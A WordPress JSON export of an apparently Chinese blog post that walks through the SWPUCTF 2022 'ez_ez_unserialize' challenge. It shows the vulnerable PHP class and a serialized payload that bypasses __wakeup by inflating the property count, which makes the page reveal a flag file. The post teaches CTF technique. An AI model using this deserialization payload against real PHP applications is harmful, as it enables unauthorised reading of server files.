{"id":2203,"date":"2025-04-01T23:37:44","date_gmt":"2025-04-01T15:37:44","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=2203"},"modified":"2025-04-01T23:37:45","modified_gmt":"2025-04-01T15:37:45","slug":"swpuctf-2022-%e6%96%b0%e7%94%9f%e8%b5%9bez_ez_unserialize","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/04\/01\/swpuctf-2022-%e6%96%b0%e7%94%9f%e8%b5%9bez_ez_unserialize\/","title":{"rendered":"SWPUCTF 2022 \u65b0\u751f\u8d5bez_ez_unserialize"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401224714.png\" alt=\"Pasted image 20250401224714.png\"><\/p>\n<h1>\u4e00\u3001\u8bbf\u95ee\u7f51\u7ad9<\/h1>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401224757.png\" alt=\"Pasted image 20250401224757.png\"><\/p>\n<h1>\u4e8c\u3001\u5206\u6790\u4ee3\u7801<\/h1>\n<pre><code class=\"language-php\">&lt;?php  \nclass\u00a0X  \n{  \n\u00a0\u00a0\u00a0\u00a0public\u00a0$x\u00a0=\u00a0__FILE__;  \n\u00a0\u00a0\u00a0\u00a0function\u00a0__construct($x)  \n\u00a0\u00a0\u00a0\u00a0{\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$this-&gt;x\u00a0=\u00a0$x;  \n\u00a0\u00a0\u00a0\u00a0}  \n\u00a0\u00a0\u00a0\u00a0function\u00a0__wakeup()  \n\u00a0\u00a0\u00a0\u00a0{  \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if\u00a0($this-&gt;x\u00a0!==\u00a0__FILE__)\u00a0{\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$this-&gt;x\u00a0=\u00a0__FILE__;  \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}  \n\u00a0\u00a0\u00a0\u00a0}  \n\u00a0\u00a0\u00a0\u00a0function\u00a0__destruct()  
\n\u00a0\u00a0\u00a0\u00a0{\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0highlight_file($this-&gt;x);\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/flag\u00a0is\u00a0in\u00a0fllllllag.php\u00a0\u00a0\u00a0\u00a0}  \n}  \nif\u00a0(isset($_REQUEST['x']))\u00a0{  \n\u00a0\u00a0\u00a0\u00a0@unserialize($_REQUEST['x']);  \n}\u00a0else\u00a0{\u00a0\u00a0\u00a0\n\thighlight_file(__FILE__);  \n}\n<\/code><\/pre>\n<pre><code>\u5934\uff1ax\n\n__wakeup\u7ed5\u8fc7  $this-&gt;x=fllllllag.php\u00a0\n\n\u5c3e\uff1ax-&gt;__destruct-&gt;highlight_file $this-&gt;x=fllllllag.php\u00a0\n<\/code><\/pre>\n<p>\u89e3\u9898\u601d\u8def\uff1a<br \/>\n1.\u5934\uff1ax<br \/>\n2.\u5c3e\uff1a<code>x-&gt;__destruct-&gt;highlight_file<\/code><br \/>\n3.wakeup\u51fd\u6570\u4f1a\u5c06\u53d8\u91cfx\u8986\u76d6\uff0c\u9700\u8981\u7ed5\u8fc7<br \/>\n4.construct\u4e0d\u89e6\u53d1\uff0c\u4e0d\u7528\u7ba1<br \/>\n5.\u5c06x\u8d4b\u503c\u4e3afllllllag.php<\/p>\n<h1>\u4e09\u3001\u751f\u6210payload<\/h1>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401225838.png\" alt=\"Pasted image 20250401225838.png\"><\/p>\n<pre><code>O:1:&quot;X&quot;:1:{s:1:&quot;x&quot;;s:13:&quot;fllllllag.php&quot;;}\n\nO%3A1%3A%22X%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D\n<\/code><\/pre>\n<p>\u7ed5\u8fc7wakeup\u9b54\u672f\u65b9\u6cd5\uff0c\u5c06\u7c7b\u5c5e\u6027\u7684\u6570\u91cf\u6539\u4e3a2<\/p>\n<pre><code>O%3A1%3A%22X%22%3A2%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D\n<\/code><\/pre>\n<h1>\u56db\u3001\u6267\u884cpayload<\/h1>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401225808.png\" alt=\"Pasted image 
20250401225808.png\"><\/p>\n<h1>\u603b\u7ed3<\/h1>\n<ul>\n<li>php\u53cd\u5e8f\u5217\u5316<\/li>\n<li>wakeup\u7ed5\u8fc7\uff1a\u5c06\u7c7b\u7684\u5c5e\u6027\u6570\u91cf\u66f4\u6539<\/li>\n<li>construct\u5728\u53cd\u5e8f\u5217\u5316\u4e2d\u4e0d\u89e6\u53d1<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u8bbf\u95ee\u7f51\u7ad9 \u4e8c\u3001\u5206\u6790\u4ee3\u7801 &lt;?php class\u00a0X { \u00a0\u00a0\u00a0\u00a0public\u00a0$x\u00a0=\u00a0__FILE [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24,8,22],"tags":[64,37],"class_list":["post-2203","post","type-post","status-publish","format-standard","hentry","category-buuctf","category-ctf","category-ctf-web","tag-wakeup","tag-37"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2203"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2203\/revisions"}],"predecessor-version":[{"id":2204,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2203\/revisions\/2204"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2203"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2203"}],"curies":[{"name":"wp","hr
ef":"https:\/\/api.w.org\/{rel}","templated":true}]}}